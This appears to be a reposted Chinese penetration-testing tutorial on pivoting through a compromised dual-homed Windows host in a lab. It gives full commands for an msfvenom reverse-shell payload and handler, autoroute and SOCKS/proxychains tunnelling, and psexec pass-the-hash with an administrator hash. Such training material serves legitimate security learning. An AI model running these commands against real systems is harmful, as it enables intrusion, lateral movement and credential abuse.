标题 简介 类型 公开时间
关联规则 关联知识 关联工具 关联文档 关联抓包
参考1(官网)
参考2
参考3
详情
[SAFE-ID: JIWO-2024-3110]   作者: 羽毛 发表于: [2022-05-27]

本文共 [304] 位读者顶过

在渗透测试过程中,经常拿到web主机与数据库不同在一个网段,可以得出这台主机还连着一个内网,[出自:jiwo.org]
如果想要继续渗透内网,可以把这台web主机当作跳板机,对内网进行渗透。imagekali无法直接访问目标主机 但是kali获取受害者的权限 得知可以访问目标主机,所以可以通过受害者做
跳板访问目标主机。

> kali IP:192.168.0.152
image靶机12server5 双网卡:192.168.0.188、10.10.10.139
image靶机12server4IP:10.10.10.138
imagekali跟12server5是这个互ping的
imageimage但是kali 是ping不通12server4的
image假如我们拿到了12server5的服务器权限的话,我们看到它是有两个网卡的,那么我们可以把12server5当做跳板然后访问12server4主机,这样就是跨路由访问,就是不同一个网段的。
首先使用kali生成后门文件:msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.0.152 LPORT=4444 -f exe > shell.exe
image打开msf进行监听:
msfconsole
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set lhost 192.168.0.152
set lport 4444
exploit
image把生成的后门文件放到12server5运行,msf会得到域的一个普通session
imageifconfig查看网卡
image现在我们是可以在meterpreter里面对10.10.10.139进行访问的,可以是用模块对它进行扫描
image但是只能在meterpreter里面访问,在外面还是不行的
image绑定路由 不绑定路由就没法访问目标主机:run autoroute -s 10.10.10.0/24,
run autoroute -p查看是否设好
image我们还需要一个socks,background把session放后台,然后选择use auxiliary/server/socks_proxy模块,这个模块
东西基本都是默认的,不需要更改,直接run

imageimage我们还要编辑隧道配置文件:sudo vi /etc/proxychains4.conf
执行后,拉到最下面,按i把socks4改成5,IP可以是127,这里我就使用kali的IP了,端口的话设1080,要跟auxiliary/server/socks_proxy模块的端口一致,完成后按ESC然后Shift键加: 在输入wq保存退出。
image接着使用命令扫一下:proxychains4 nmap 10.10.10.138 -sT -A -p 445
image选择use exploit/windows/smb/ms17_010_psexec模块
设置代理:setg Proxies socks5:192.168.0.152:1080
这个参数也要加进去:set ReverseAllowProxy true
imagepsexec这个模块默认是反向连接的,我们使用了代理,要使用正向连接set payload windows/meterpreter/bind_tcp
imageset rhost 10.10.10.138设置目标
set smbuser administrator用户名
set smbpass aad3b435b51404eeaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4管理员密码哈希值,忘记截图了。
image

run了半天没成功,最后发现我模块选错了。。。。。

应该是选:use exploit/windows/smb/psexec
image成功
imageimage
image

本文仅用于技术交流,请勿用于非法用途。

来自FreeBuf.COM

评论

暂无
发表评论
 返回顶部 
热度(304)
 关注微信